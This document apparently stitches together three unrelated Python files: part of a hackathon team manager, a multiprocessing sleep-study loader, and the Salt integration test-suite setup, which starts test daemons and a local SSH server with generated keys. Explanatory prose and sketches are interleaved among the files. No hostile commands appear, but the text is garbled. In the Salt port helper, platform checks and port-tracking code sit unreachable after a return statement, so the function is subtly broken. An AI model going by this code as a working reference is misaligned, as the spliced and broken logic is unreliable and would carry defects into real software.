return Team.objects(hackathon=hackathon_id, name=team_name).first()
except ValidationError:
return None
def __validate_team_permission(self, hackathon_id, team, user):
"""Validate current login user whether has proper right on specific team.
:type hackathon_id: int
:param hackathon_id: id of hackathon related to the team
:type team: Team
:param team: team to be checked
:type user: User
:param user: current login user
:raise: Forbidden if user is neither team leader, hackathon admin nor super admin
"""
self.log.debug(
"validate team permission on hackathon %s and team %s for user %s" % (hackathon_id, team.name, user.id))
# check if team leader
if team.leader.id != user.id:
# check if hackathon admin
if not self.admin_manager.is_hackathon_admin(hackathon_id, user.id):
# super permission is already checked in admin_manager.is_hackathon_admin
self.log.debug("Access denied for user [%s]%s trying to access team '%s' of hackathon %s " %
(user.id, user.name, team, hackathon_id))
raise Forbidden(description="You don't have permission on team '%s'" % team.name)
return
def __get_hackathon_and_show_detail(self, team):
team_dic = team.dic()
team_dic['leader'] = {
'id': str(team.leader.id),
'name': team.leader.name,
'nickname': team.leader.nickname,
'avatar_url': team.leader.avatar_url
}
team_dic['cover'] = team_dic.get('cover', '')
team_dic['project_name'] = team_dic.get('project_name', '')
team_dic['dev_plan'] = team_dic.get('dev_plan', '')
[team_dic.pop(key, None) for key in ['assets', 'awards', 'azure_keys', 'scores', 'templates', 'members']]
team_dic["hackathon"] = hack_manager.get_hackathon_detail(team.hackathon)
return team_dic
def __email_notify_dev_plan_submitted(self, team):
# send emails to all admins of this hackathon when one team dev plan is submitted.
admins = UserHackathon.objects(hackathon=team.hackathon, role=HACK_USER_TYPE.ADMIN).distinct("user")
email_title = self.util.safe_get_config("email.email_templates.dev_plan_submitted_notify.title", None)
file_name = self.util.safe_get_config("email.email_templates.dev_plan_submitted_notify.default_file_name", None)
sender = self.util.safe_get_config("email.default_sender", "")
# todo remove receivers_forced
receivers_forced = self.util.safe_get_config("email.receivers_forced", [])
try:
if email_title and file_name:
path = abspath("%s/.." % dirname(realpath(__file__)))
f = open(path + "/resources/email/" + file_name, "r")
email_content = f.read()
email_title = email_title % (team.name.encode("utf-8"))
email_content = email_content.replace("{{team_name}}", team.name.encode("utf-8"))
email_content = email_content.replace("{{team_id}}", str(team.id))
email_content = email_content.replace("{{hackathon_name}}", team.hackathon.name.encode("utf-8"))
f.close()
else:
self.log.error("send email_notification (dev_plan_submitted_event) fails: please check the config")
return False
except Exception as e:
self.log.error(e)
return False
# isNotified: whether at least one admin has been notified by emails.
isNotified = False
for admin in admins:
isSent = False
primary_emails = [email.email for email in admin.emails if email.primary_email]
nonprimary_emails = [email.email for email in admin.emails if not email.primary_email]
# send notification to all primary-mailboxes.
if not len(primary_emails) == 0:
isSent = self.util.send_emails(sender, primary_emails, email_title, email_content)
            # if sending to the primary mailboxes fails, send email to one non-primary mailbox.
if not isSent and not len(nonprimary_emails) == 0:
for nonpri_email in nonprimary_emails:
if self.util.send_emails(sender, [nonpri_email], email_title, email_content):
isSent = True
break
isNotified = isNotified or isSent
# todo remove this code
self.util.send_emails(sender, receivers_forced, email_title, email_content)
self.log.debug(team.name + ": dev_plan email notification result: " + str(isNotified))
return isNotified
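
TeamManager leans on two mongoengine query features throughout: composable Q filters and the members__match ($elemMatch) lookup on an embedded list. Below is a hedged sketch of those query shapes with throwaway models; it is not the project's real schema, and it assumes a local MongoDB instance to connect to.

# Hedged sketch of the query shapes used above, with stand-in models.
from mongoengine import (Document, EmbeddedDocument, EmbeddedDocumentField,
                         IntField, ListField, Q, StringField, connect)

class Member(EmbeddedDocument):
    user = StringField()
    status = IntField()

class MiniTeam(Document):
    name = StringField()
    hackathon = StringField()
    members = ListField(EmbeddedDocumentField(Member))

if __name__ == "__main__":
    connect("team_manager_sketch")   # assumes a MongoDB instance on localhost
    MiniTeam(name="alpha", hackathon="h1",
             members=[Member(user="u1", status=1)]).save()
    # Same shape as __get_valid_team_by_user(): hackathon + approved member.
    team = MiniTeam.objects(hackathon="h1",
                            members__match={"user": "u1", "status": 1}).first()
    # Same shape as get_hackathon_team_list(): composable Q filters.
    count = MiniTeam.objects(Q(hackathon="h1") & Q(name__icontains="alp")).count()
    print(team.name, count)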
study_loader.py
import logging
import os
from psg_utils.errors import CouldNotLoadError
from threading import Thread
from threading import Event as ThreadEvent
from multiprocessing import JoinableQueue, Process, Lock, Event, cpu_count
from time import sleep
logger = logging.getLogger(__name__)
def _load_func(load_queue, results_queue, load_errors_queue, lock, stop_event):
"""
Args:
load_queue:
Returns:
"""
while not stop_event.is_set():
to_load, dataset_id = load_queue.get()
try:
to_load.load()
results_queue.put((to_load, dataset_id))
except CouldNotLoadError as e:
with lock:
logger.warning("[ERROR in StudyLoader] "
"Could not load study '{}' (error: {})".format(to_load, e))
load_errors_queue.put((to_load, dataset_id))
finally:
load_queue.task_done()
def _gather_loaded(output_queue, registered_datasets, stop_event):
while not stop_event.is_set():
# Wait for studies in the output queue
sleep_study, dataset_id = output_queue.get(block=True)
load_put_function = registered_datasets[dataset_id][0]
load_put_function(sleep_study)
output_queue.task_done()
def _gather_errors(load_errors_queue, registered_datasets, stop_event):
while not stop_event.is_set():
# Wait for studies in the output queue
sleep_study, dataset_id = load_errors_queue.get(block=True)
error_put_function = registered_datasets[dataset_id][1]
error_put_function(sleep_study)
load_errors_queue.task_done()
def get_num_cpus(n_load_processes):
"""
n_load_processes: [None, int] The number of processes to spin up for study loading.
If None, uses int(os.environ['SLURM_JOB_CPUS_PER_NODE']) if set, otherwise
multiprocessing.cpu_count() (using all visible CPUs).
"""
if n_load_processes is None:
slurm_cpus = os.environ.get('SLURM_JOB_CPUS_PER_NODE')
if slurm_cpus:
logger.info(f"Environment variable SLURM_JOB_CPUS_PER_NODE={slurm_cpus}")
n_load_processes = int(slurm_cpus)
else:
num_cpus = cpu_count()
logger.info(f"multiprocessing.cpu_count() returned N={num_cpus} visible CPUs.")
n_load_processes = num_cpus
return n_load_processes
class StudyLoader:
"""
    Implements a multiprocessing SleepStudy loading queue
"""
def __init__(self,
n_load_processes=None,
max_queue_size=50):
"""
Args:
n_load_processes: [None, int] The number of processes to spin up for study loading.
If None, uses int(os.environ['SLURM_JOB_CPUS_PER_NODE']) if set, otherwise
multiprocessing.cpu_count() (using all visible CPUs).
"""
# Setup load thread pool
self.max_queue_size = max_queue_size
self._load_queue = JoinableQueue(maxsize=self.max_queue_size)
self._output_queue = JoinableQueue(maxsize=self.max_queue_size)
self._load_errors_queue = JoinableQueue(maxsize=3) # We probably want to raise
# an error if this queue
# gets to more than ~3!
self.process_lock = Lock()
# Init loading processes
num_cpus = get_num_cpus(n_load_processes)
logger.info(f"Creating StudyLoader with N={num_cpus} loading processes...")
args = [self._load_queue, self._output_queue, self._load_errors_queue, self.process_lock]
self.processes_and_threads = []
self.stop_events = []
for _ in range(num_cpus):
stop_event = Event()
p = Process(target=_load_func, args=args + [stop_event], daemon=True)
p.start()
self.processes_and_threads.append(p)
self.stop_events.append(stop_event)
# Prepare loaded studies gathering thread
self._registered_datasets = {}
gather_loaded_stop_event = ThreadEvent()
self.gather_loaded_thread = Thread(target=_gather_loaded,
args=(self._output_queue,
self._registered_datasets,
gather_loaded_stop_event),
daemon=True)
self.stop_events.append(gather_loaded_stop_event)
self.processes_and_threads.append(self.gather_loaded_thread)
self.gather_loaded_thread.start()
# Start thread to collect load errors
gather_errors_stop_event = ThreadEvent()
self.gather_errors_thread = Thread(target=_gather_errors,
args=(self._load_errors_queue,
self._registered_datasets,
gather_errors_stop_event),
daemon=True)
self.processes_and_threads.append(self.gather_errors_thread)
self.stop_events.append(gather_errors_stop_event)
self.gather_errors_thread.start()
def stop(self):
logger.info(f"Stopping N={len(self.processes_and_threads)} StudyLoader processes and threads...")
for stop_event in self.stop_events:
stop_event.set()
for process_or_thread in self.processes_and_threads:
process_or_thread.join()
def qsize(self):
""" Returns the qsize of the load queue """
        return self._load_queue.qsize()
@property
def maxsize(self):
return self.max_queue_size
def join(self):
""" Join on all queues """
logger.info("Awaiting preload from {} (train) datasets".format(
len(self._registered_datasets)
))
self._load_queue.join()
logger.info("Load queue joined...")
self._output_queue.join()
logger.info("Output queue joined...")
self._load_errors_queue.join()
logger.info("Errors queue joined...")
def add_study_to_load_queue(self, study, dataset_id):
if dataset_id not in self._registered_datasets:
raise RuntimeError("Dataset {} is not registered. "
"Call StudyLoader.register_dataset before adding"
" items from that dataset to the loading "
"queue".format(dataset_id))
if self.qsize() == self.maxsize:
logger.warning("Loading queue seems about to block! "
"(max_size={}, current={}). "
"Sleeping until loading queue is empty "
"again.".format(self.maxsize,
self.qsize()))
while self.qsize() > 1:
sleep(1)
self._load_queue.put((study, dataset_id))
def register_dataset(self, dataset_id, load_put_function, error_put_function):
with self.process_lock:
if dataset_id in self._registered_datasets:
raise RuntimeWarning("A dataset of ID {} has already been "
"registered.".format(dataset_id))
self._registered_datasets[dataset_id] = (
load_put_function, error_put_function
)
def de_register_dataset(self, dataset_id):
with self.process_lock:
del self._registered_datasets[dataset_id]
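
StudyLoader is essentially JoinableQueue plumbing: loader processes consume a load queue, gatherer threads drain the output queue, and join() waits on both. A minimal stdlib sketch of that pattern (the doubling below stands in for to_load.load()):

# Hedged sketch of the queue plumbing used by StudyLoader: a worker process
# consumes a JoinableQueue and a gatherer thread collects the results.
from multiprocessing import JoinableQueue, Process
from threading import Thread

def load_worker(load_q, out_q):
    while True:
        item = load_q.get()
        try:
            out_q.put(item * 2)          # stand-in for to_load.load()
        finally:
            load_q.task_done()

def gatherer(out_q, results):
    while True:
        results.append(out_q.get())
        out_q.task_done()

if __name__ == "__main__":
    load_q, out_q, results = JoinableQueue(maxsize=50), JoinableQueue(maxsize=50), []
    Process(target=load_worker, args=(load_q, out_q), daemon=True).start()
    Thread(target=gatherer, args=(out_q, results), daemon=True).start()
    for i in range(5):
        load_q.put(i)
    load_q.join()                        # like StudyLoader.join(): wait for loads
    out_q.join()                         # ...and for the gatherer to drain them
    print(results)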
__init__.py
# -*- coding: utf-8 -*-
"""
Set up the Salt integration test suite
"""
# Import Python libs
from __future__ import absolute_import, print_function
import atexit
import copy
import errno
import logging
import multiprocessing
import os
import pprint
import re
import shutil
import signal
import socket
import stat
import subprocess
import sys
import tempfile
import threading
import time
from datetime import datetime, timedelta
# Import salt tests support dirs
from tests.support.paths import * # pylint: disable=wildcard-import
from tests.support.processes import * # pylint: disable=wildcard-import
from tests.support.unit import TestCase
from tests.support.case import ShellTestCase
from tests.support.parser import PNUM, print_header, SaltTestcaseParser
from tests.support.helpers import requires_sshd_server, RedirectStdStreams
from tests.support.cli_scripts import ScriptPathMixin
from tests.support.mixins import CheckShellBinaryNameAndVersionMixin, ShellCaseCommonTestsMixin
from tests.support.mixins import AdaptedConfigurationTestCaseMixin, SaltClientTestCaseMixin
from tests.support.mixins import SaltMinionEventAssertsMixin, SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
# Import Salt libs
import salt
import salt.config
import salt.master
import salt.minion
import salt.output
import salt.runner
import salt.utils.color
import salt.utils.files
import salt.utils.msgpack
import salt.utils.path
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import salt.utils.yaml
import salt.log.setup as salt_log_setup
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt.exceptions import SaltClientError
# Import 3rd-party libs
import msgpack
from salt.ext import six
try:
import salt.ext.six.moves.socketserver as socketserver # pylint: disable=no-name-in-module
except ImportError:
import socketserver
# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic
log = logging.getLogger(__name__)
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
"""
Return a random unused port on localhost
"""
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
usock.bind(("127.0.0.1", 0))
port = usock.getsockname()[1]
if port in (54505, 54506, 64505, 64506, 64507, 64508, 64510, 64511, 64520, 64521):
# These ports are hardcoded in the test configuration
port = get_unused_localhost_port()
usock.close()
return port
DARWIN = True if sys.platform.startswith("darwin") else False
BSD = True if "bsd" in sys.platform else False
AIX = True if sys.platform.startswith("aix") else False
if (AIX or DARWIN) and port in _RUNTESTS_PORTS:
port = get_unused_localhost_port()
usock.close()
return port
_RUNTESTS_PORTS[port] = usock
if DARWIN or BSD or AIX:
usock.close()
return port
def close_open_sockets(sockets_dict):
for port in list(sockets_dict):
sock = sockets_dict.pop(port)
sock.close()
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
SALT_LOG_PORT = get_unused_localhost_port()
class ThreadingMixIn(socketserver.ThreadingMixIn):
daemon_threads = False
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer, object):
allow_reuse_address = True
def server_activate(self):
self.shutting_down = threading.Event()
super(ThreadedSocketServer, self).server_activate()
def server_close(self):
if hasattr(self, "shutting_down"):
self.shutting_down.set()
super(ThreadedSocketServer, self).server_close()
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
encoding = 'utf-8'
unpacker_kwargs = {}
if msgpack.version >= (0, 5, 2):
unpacker_kwargs['raw'] = False
else:
unpacker_kwargs['encoding'] = encoding
unpacker = msgpack.Unpacker(**unpacker_kwargs)
while not self.server.shutting_down.is_set():
try:
wire_bytes = self.request.recv(1024)
if not wire_bytes:
break
unpacker.feed(wire_bytes)
for record_dict in unpacker:
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
del record_dict
except (EOFError, KeyboardInterrupt, SystemExit):
break
except socket.error as exc:
try:
if exc.errno == errno.WSAECONNRESET:
# Connection reset on windows
break
except AttributeError:
# We're not on windows
pass
log.exception(exc)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
class TestDaemonStartFailed(Exception):
"""
Simple exception to signal that a test daemon failed to start
"""
class TestDaemon(object):
"""
Set up the master and minion daemons, and run related cases
"""
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 600
def __init__(self, parser):
self.parser = parser
self.colors = salt.utils.color.get_colors(
self.parser.options.no_colors is False
)
if salt.utils.platform.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ""
def __enter__(self):
"""
Start a master and minion
"""
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(self.master_opts)
# Set up PATH to mockbin
self._enter_mockbin()
self.minion_targets = set(["minion", "sub_minion"])
if self.parser.options.transport == "zeromq":
self.start_zeromq_daemons()
elif self.parser.options.transport == 'tcp':
self.start_tcp_daemons()
self.pre_setup_minions()
self.setup_minions()
if getattr(self.parser.options, "ssh", False):
self.prep_ssh()
self.wait_for_minions(time.time(), self.MINIONS_CONNECT_TIMEOUT)
if self.parser.options.sysinfo:
try:
print_header(
"~~~~~~~ Versions Report ",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("~~~~~~~ Versions Report ", inline=True)
print("\n".join(salt.version.versions_report()))
try:
print_header(
"~~~~~~~ Minion Grains Information ",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("~~~~~~~ Minion Grains Information ", inline=True)
grains = self.client.cmd("minion", "grains.items")
minion_opts = self.minion_opts.copy()
minion_opts["color"] = self.parser.options.no_colors is False
salt.output.display_output(grains, "grains", minion_opts)
try:
print_header(
"=",
sep="=",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("", sep="=", inline=True)
try:
return self
finally:
self.post_setup_minions()
def start_zeromq_daemons(self):
"""
Fire up the daemons used for zeromq tests
"""
self.log_server = ThreadedSocketServer(
("localhost", SALT_LOG_PORT), SocketServerRequestHandler
)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.start()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-master ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name="salt-master",
daemon_id=self.master_opts["id"],
daemon_log_prefix="salt-master/{}".format(self.master_opts["id"]),
daemon_cli_script_name="master",
daemon_config=self.master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=60)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name="salt-minion",
daemon_id=self.master_opts["id"],
daemon_log_prefix="salt-minion/{}".format(self.minion_opts["id"]),
daemon_cli_script_name="minion",
daemon_config=self.minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=60)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name="sub salt-minion",
daemon_id=self.master_opts["id"],
daemon_log_prefix="sub-salt-minion/{}".format(
self.sub_minion_opts["id"]
),
daemon_cli_script_name="minion",
daemon_config=self.sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=60)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.prep_syndic()
self.smaster_process = start_daemon(
daemon_name="salt-smaster",
daemon_id=self.syndic_master_opts["id"],
daemon_log_prefix="salt-smaster/{}".format(
self.syndic_master_opts["id"]
),
daemon_cli_script_name="master",
daemon_config=self.syndic_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
start_timeout=60)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting syndic salt-master ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.syndic_process = start_daemon(
daemon_name="salt-syndic",
daemon_id=self.syndic_opts["id"],
daemon_log_prefix="salt-syndic/{}".format(self.syndic_opts["id"]),
daemon_cli_script_name="syndic",
daemon_config=self.syndic_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR,
daemon_class=SaltSyndic,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=60)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
if self.parser.options.proxy:
self.minion_targets.add(self.proxy_opts["id"])
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-proxy ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.proxy_process = start_daemon(
daemon_name="salt-proxy",
daemon_id=self.proxy_opts["id"],
daemon_log_prefix="salt-proxy/{}".format(self.proxy_opts["id"]),
daemon_cli_script_name="proxy",
daemon_config=self.proxy_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltProxy,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-proxy ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-proxy ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
start_tcp_daemons = start_zeromq_daemons
def prep_syndic(self):
"""
Create a roster file for salt's syndic
"""
roster_path = os.path.join(FILES, "conf/_ssh/roster")
shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR)
shutil.copy(roster_path, RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
def prep_ssh(self):
"""
Generate keys and start an ssh daemon on an alternate port
"""
sys.stdout.write(
" * {LIGHT_GREEN}Starting {0} ... {ENDC}".format(
"SSH server", **self.colors
)
)
keygen = salt.utils.path.which("ssh-keygen")
sshd = salt.utils.path.which("sshd")
if not (keygen and sshd):
print(
"WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!"
)
return
if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR):
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
# Generate client key
pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test.pub")
priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test")
if os.path.exists(pub_key_test_file):
os.remove(pub_key_test_file)
if os.path.exists(priv_key_test_file):
os.remove(priv_key_test_file)
keygen_process = subprocess.Popen(
[
keygen,
"-t",
"ecdsa",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"key_test",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR,
)
_, keygen_err = keygen_process.communicate()
if keygen_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_err)
)
)
sshd_config_path = os.path.join(FILES, "conf/_ssh/sshd_config")
shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR)
auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test.pub")
# Generate server key
server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "server")
if not os.path.exists(server_key_dir):
os.makedirs(server_key_dir)
server_dsa_priv_key_file = os.path.join(server_key_dir, "ssh_host_dsa_key")
server_dsa_pub_key_file = os.path.join(server_key_dir, "ssh_host_dsa_key.pub")
server_ecdsa_priv_key_file = os.path.join(server_key_dir, "ssh_host_ecdsa_key")
server_ecdsa_pub_key_file = os.path.join(
server_key_dir, "ssh_host_ecdsa_key.pub"
)
server_ed25519_priv_key_file = os.path.join(
server_key_dir, "ssh_host_ed25519_key"
)
server_ed25519_pub_key_file = os.path.join(
            server_key_dir, "ssh_host_ed25519_key.pub"
)
for server_key_file in (
server_dsa_priv_key_file,
server_dsa_pub_key_file,
server_ecdsa_priv_key_file,
server_ecdsa_pub_key_file,
server_ed25519_priv_key_file,
server_ed25519_pub_key_file,
):
if os.path.exists(server_key_file):
os.remove(server_key_file)
keygen_process_dsa = subprocess.Popen(
[
keygen,
"-t",
"dsa",
"-b",
"1024",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_dsa_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_dsa_err = keygen_process_dsa.communicate()
if keygen_dsa_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_dsa_err)
)
)
keygen_process_ecdsa = subprocess.Popen(
[
keygen,
"-t",
"ecdsa",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_ecdsa_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
        _, keygen_ecdsa_err = keygen_process_ecdsa.communicate()
        if keygen_ecdsa_err:
            print(
                "ssh-keygen had errors: {0}".format(
                    salt.utils.stringutils.to_str(keygen_ecdsa_err)
                )
            )
keygen_process_ed25519 = subprocess.Popen(
[
keygen,
"-t",
"ed25519",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_ed25519_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_ed25519_err = keygen_process_ed25519.communicate()
if keygen_ed25519_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_ed25519_err)
)
)
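        # Register the client key as authorized and add HostKey entries only for
        # the server keys that were generated without errors.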
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "sshd_config"), "a"
) as ssh_config:
ssh_config.write("AuthorizedKeysFile {0}\n".format(auth_key_file))
if not keygen_dsa_err:
ssh_config.write("HostKey {0}\n".format(server_dsa_priv_key_file))
            if not keygen_ecdsa_err:
ssh_config.write("HostKey {0}\n".format(server_ecdsa_priv_key_file))
if not keygen_ed25519_err:
ssh_config.write("HostKey {0}\n".format(server_ed25519_priv_key_file))
self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "sshd.pid")
self.sshd_process = subprocess.Popen(
[sshd, "-f", "sshd_config", "-o", "PidFile={0}".format(self.sshd_pidfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR,
)
_, sshd_err = self.sshd_process.communicate()
if sshd_err:
print(
"sshd had errors on startup: {0}".format(
salt.utils.stringutils.to_str(sshd_err)
)
)
else:
os.environ['SSH_DAEMON_RUNNING'] = 'True'
self.prep_syndic()
        with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'roster'), 'a') as roster:
            roster.write(' user: {0}\n'.format(RUNTIME_VARS.RUNNING_TESTS_USER))
            roster.write(' priv: {0}/{1}\n'.format(RUNTIME_VARS.TMP_CONF_DIR, 'key_test'))
            if salt.utils.platform.is_darwin():
                roster.write(' set_path: $PATH:/usr/local/bin/\n')
        sys.stdout.write(' {LIGHT_GREEN}STARTED!\n{ENDC}'.format(**self.colors))
@classmethod
def config(cls, role):
"""
Return a configuration for a master/minion/syndic.
Currently these roles are:
* master
* minion
* syndic
* syndic_master
* sub_minion
* proxy
"""
return RUNTIME_VARS.RUNTIME_CONFIGS[role]
@classmethod
def config_location(cls):
return RUNTIME_VARS.TMP_CONF_DIR
@property
def client(self):
"""
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
"""
if "runtime_client" not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS[
"runtime_client"
] = salt.client.get_local_client(mopts=self.master_opts)
return RUNTIME_VARS.RUNTIME_CONFIGS["runtime_client"]
@classmethod
def transplant_configs(cls, transport='zeromq'):
if os.path.isdir(RUNTIME_VARS.TMP):
shutil.rmtree(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP_ROOT_DIR)
